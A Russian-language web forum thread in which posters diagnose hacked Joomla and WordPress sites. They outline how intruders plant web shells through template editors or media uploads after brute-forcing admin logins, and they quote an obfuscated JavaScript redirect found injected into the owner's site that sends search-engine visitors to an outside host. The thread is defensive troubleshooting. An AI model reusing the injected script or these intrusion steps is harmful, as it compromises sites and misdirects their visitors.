В админке сайта выводится то имя базы данных, которое прописано именно в configuration.php, нигде больше название базы не прописывается, следовательно то, о чём вы пишите ИМХО не может быть правдой.
Ну почему вы так уверены? Я например обычно вижу 2 варианта.
1. Шел вставляют прямо в index.php шаблона, не обязательно даже того, который отображается на сайте, через редактор шаблона.
2. Заходят в настройки, разрешают загрузку файлов php и спокойно заливают шелл в картинки через Медиа-менеджер.
И в первом и во втором случае вначале кража пароля админа либо через уязвимости, либо банально брутят (ведь логин то у большинства admin, мало кто его меняет).
Это случаи из моей практики, ни разу взломанный сайт на Джумле с залитым по фтп шеллом не встречал.
команды прописываются в ssh клиенте, например putty
А что мешает злоумышленнику зайти через тот же веб-шелл и сменить права на 777? 😂
На скринах у вас вордпресс, вы его обновляли? Про уязвимость timthumb надеюсь слышали, он у вас обновлённый?
Сайты на Joomla версии ниже чем 1.5.25 у вас есть?
Ваши проблемы можно решить только обновлением всех сайтов и полным удалением всей гадости, которую вам уже успели напихать. Но для этого её нужно найти. Дам подсказку - есть уже готовые скрипты для этих целей, погуглите и вы их найдёте.
Так что разбирайтесь, это всегда идёт на пользу, гугл всё знает, ну а если уже времени нету, то тогда к спецам, но такие услуги бесплатными не бывают.
а на шеллы вы сайты проверяли?
раз вы говорите что после первого раза меняли пароль, то тут 80% что фтп вообще не при чём. И запрещайте вы что угодно, а они будут дальше через шелл творить свои дела
Помочь то вам многие здесь могут, в том числе и я. Только вот есть одна простая истина - любой труд должен быть оплачен. Вы на работу ведь наверное не бесплатно ходите?☝
И не забудьте поискать ещё такие файлики на сайте. Их частенько дублируют в какие нибудь труднодоступные места, например в папку с модулем каким нибудь, причём назвать могут как угодно, хоть index.php. Не факт конечно что они будут, но есть большая вероятность.:)
это обычные дорвеи.
Способов залить их миллион, достаточно узнать например пароль в админку той же джумлы. Узнать пароль тоже не мега сложно, можно подобрать, можно добыть через уязвимости. И не только к джумле это относится.
Поищите, может и шелл найдёте где нибудь на одном из сайтов.
Всегда обновляться надо и сайты стараться держать в разных аккаунтах если у вас сервер или VDS
А откуда вы знаете что те взломанные сайты стоят в одиночку на хостинг аккаунтах? Взломали один сайт - получили доступ ко всем сайтам пользователя.
Ну а не сможете сами победить напасть - обращайтесь, поможем.
Если по русски, то перенаправляло траф с поисковиков на левый сайт.
А вообще кстати вполне может быть что ломают через старый timthumb.php. Не мешало бы обновить.
У вас вот такая хрень:
<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script><div class="footer">
Попробуйте поиском, по словам altavista например или ищё по чём то в этом роде.
Но 80% что у вас эта красота дописаны внизу functions.php темы---------- Добавлено 13.02.2012 в 13:44 ----------Кстати уже не первый раз вижу это счастье и на всех инфицированных сайтах стоит WP-Super-Cache Наверное есть повод задуматься
Так а что там искать? Тупо открыл самый первый js файл и всё как на ладони.
Кстати пройдитесь поиском но остальным файлам например по слову e9.n, думаю ещё найдёте. Да и шеллы поискать бы не мешало.
